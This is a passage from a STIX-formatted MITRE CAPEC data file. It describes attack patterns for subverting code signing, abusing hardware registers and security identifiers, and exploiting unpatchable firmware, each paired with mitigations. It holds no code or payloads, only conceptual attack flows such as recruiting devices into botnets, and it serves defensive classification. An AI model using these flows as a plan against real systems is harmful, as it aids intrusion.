Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Subvert Code-signing Facilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the \"Magic Coat\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.", + "Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \"true\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.", + "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "A framework-based language that supports code signing (such as, and most commonly, Java or .NET)", + "Deployed code that has been signed by its authoring vendor, or a partner.", + "The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated." + ], + "x_capec_resources_required": [ + "The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack." + ], + "x_capec_skills_required": { + "High": "Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.", + "id": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e2f360c-c268-4b41-a5b7-b73b41b6ad49", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.", + "id": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.", + "id": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32aef2ed-6339-425f-9acf-8117ffb0c421", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.", + "id": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e7a22ee-e503-4bb5-842d-dccfa1314700", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security lock programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ce0cc33-be72-46dc-91f1-c7e2891fb760", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.", + "id": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ffd20-3728-428b-b493-fba7c95d706c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent.", + "id": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5af32ae4-547c-4e74-97a3-7ac9778fccd7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action.\n ", + "external_references": [ + { + "external_id": "CAPEC-681", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/681.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "description": "PCIe Device Measurement Requirements, 2018--09, Intel Corporation", + "external_id": "REF-694", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf" + }, + { + "description": "John Butterworth, Cory Kallenberg, Xeno Kovah, BIOS Chronomancy: Fixing the Core Root of Trust for Measurement, 2013--07---31", + "external_id": "REF-695", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf" + } + ], + "id": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Hardware Security Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers \"1\" and \"2\". The Main-controller (ID \"1\") is meant to have access to the AES-key registers, while the Aux-controller (ID \"2\") has access to the access-policy register. If a SoC incorrectly generates security identifier \"1\" for both agents, then both agents will have access to the AES-key registers. This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access.\n " + ], + "x_capec_extended_description": "\n A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:\n \n The security identifiers are missing\n The security identifiers are incorrectly implemented or generated\n The security identifiers are generated with an obsolete encoding\n The security identifiers are generated and implemented correctly, but are improperly protected\n \n If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of the identifiers being utilized.", + "Medium": "Ability to execute actions within the SoC." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d0df491b-0667-4d31-9aa1-9a9f21ccbc1c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "spec_version": "2.1", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review security identifier decoders for design inconsistencies and common weaknesses.", + "id": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38e2a6ae-74e9-48d2-8118-bf5c8494a56c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "spec_version": "2.1", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1cc36ea-b168-4d92-b480-8c003969dc5a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "spec_version": "2.1", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

    2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

    2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems and products with the ability to patch firmware or ROM code after deployment to fix vulnerabilities.", + "id": "course-of-action--2ca1e82e-84ae-463a-adbf-1d60e3f3a72c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--356d9eee-96bf-4426-b750-ee52f3559653", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2ca1e82e-84ae-463a-adbf-1d60e3f3a72c", + "spec_version": "2.1", + "target_ref": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means", + "id": "course-of-action--9f1f6ddb-9f30-4b10-870f-d65ecbef0d8c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5d15986-f2d6-4124-8dae-11ab17a58bde", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f1f6ddb-9f30-4b10-870f-d65ecbef0d8c", + "spec_version": "2.1", + "target_ref": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-69", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/69.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting 